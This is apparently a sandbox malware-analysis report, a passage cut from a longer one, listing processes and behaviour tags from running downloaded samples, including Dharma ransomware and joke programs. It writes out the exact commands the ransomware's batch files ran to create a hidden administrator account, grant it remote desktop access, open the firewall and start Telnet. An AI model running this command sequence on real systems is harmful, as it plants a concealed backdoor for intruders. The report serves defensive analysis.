PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe
PID 4008 wrote to memory of 4468	4008	msedge.exe	msedge.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

4072 attrib.exe

pid	process
4072	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\EFI_[unknowncheats.me]_.zip
1⤵
PID:212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc1bcf46f8,0x7ffc1bcf4708,0x7ffc1bcf4718
2⤵
PID:4088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
2⤵
PID:4836

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:536

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
2⤵
PID:4468

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
2⤵
PID:5032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
2⤵
PID:1364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
2⤵
PID:5068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4184 /prefetch:1
2⤵
PID:3280

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 /prefetch:8
2⤵
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
2⤵
PID:3656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
2⤵
PID:5024

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
2⤵
PID:2492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
2⤵
PID:3868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:1
2⤵
PID:2512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5688 /prefetch:8
2⤵
PID:5040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5356 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:1
2⤵
PID:1252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
2⤵
PID:4896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
2⤵
PID:4248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3164 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5728 /prefetch:8
2⤵
PID:1544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1356 /prefetch:1
2⤵
PID:3872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6596 /prefetch:8
2⤵
PID:3052

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6440 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3084

C:\Users\Admin\Downloads\CookieClickerHack.exe
"C:\Users\Admin\Downloads\CookieClickerHack.exe"
2⤵
- Executes dropped EXE
PID:1252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4248 /prefetch:1
2⤵
PID:4244

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2688 /prefetch:8
2⤵
PID:1532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2156

C:\Users\Admin\Downloads\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
2⤵
- Executes dropped EXE
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4904 -s 1200
3⤵
- Program crash
PID:1324

C:\Users\Admin\Downloads\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
2⤵
- Executes dropped EXE
PID:4064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4064 -s 1200
3⤵
- Program crash
PID:4612

C:\Users\Admin\Downloads\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
2⤵
- Executes dropped EXE
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 1200
3⤵
- Program crash
PID:1836

C:\Users\Admin\Downloads\YouAreAnIdiot.exe
"C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
2⤵
- Executes dropped EXE
PID:3108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3108 -s 1264
3⤵
- Program crash
PID:2348

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2260 /prefetch:1
2⤵
PID:4580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
2⤵
PID:1324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
2⤵
PID:3068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
2⤵
PID:2816

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:1
2⤵
PID:2712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4808 /prefetch:1
2⤵
PID:1308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
2⤵
PID:1756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
2⤵
PID:5000

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7088 /prefetch:1
2⤵
PID:2512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4900 /prefetch:1
2⤵
PID:4936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
2⤵
PID:2148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6108 /prefetch:1
2⤵
PID:4592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
2⤵
PID:4500

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6924 /prefetch:8
2⤵
PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7028 /prefetch:8
2⤵
PID:3344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
2⤵
PID:3984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7404 /prefetch:8
2⤵
PID:4828

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6892 /prefetch:8
2⤵
PID:2412

C:\Users\Admin\Downloads\Dharma.exe
"C:\Users\Admin\Downloads\Dharma.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:932

C:\Users\Admin\Downloads\ac\nc123.exe
"C:\Users\Admin\Downloads\ac\nc123.exe"
3⤵
- Executes dropped EXE
PID:1876

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
4⤵
PID:3812

C:\Users\Admin\Downloads\ac\mssql.exe
"C:\Users\Admin\Downloads\ac\mssql.exe"
3⤵
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4912

C:\Users\Admin\Downloads\ac\mssql2.exe
"C:\Users\Admin\Downloads\ac\mssql2.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
3⤵
PID:1544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
3⤵
PID:660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
4⤵
PID:2644

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1664

C:\Windows\SysWOW64\find.exe
Find "="
5⤵
PID:3340

C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
4⤵
PID:3008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
5⤵
PID:2164

C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
4⤵
PID:4396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
5⤵
PID:5052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
4⤵
PID:3176

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
5⤵
PID:2160

C:\Windows\SysWOW64\find.exe
Find "="
5⤵
PID:3976

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
4⤵
PID:4620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
5⤵
PID:4952

C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
4⤵
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
5⤵
PID:2128

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
4⤵
PID:2056

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
4⤵
PID:2940

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
4⤵
- Hide Artifacts: Hidden Users
PID:2512

C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4072

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2996

C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
4⤵
- Launches sc.exe
PID:3444

C:\Windows\SysWOW64\net.exe
net start Telnet
4⤵
PID:2644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
5⤵
PID:1644

C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
"C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
3⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:4840

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
2⤵
PID:3864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6312 /prefetch:8
2⤵
PID:2832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6936 /prefetch:8
2⤵
PID:1308

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4032 /prefetch:1
2⤵
PID:2804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2136,16588597234220339720,314758538121437800,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6312 /prefetch:8
2⤵
PID:1344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
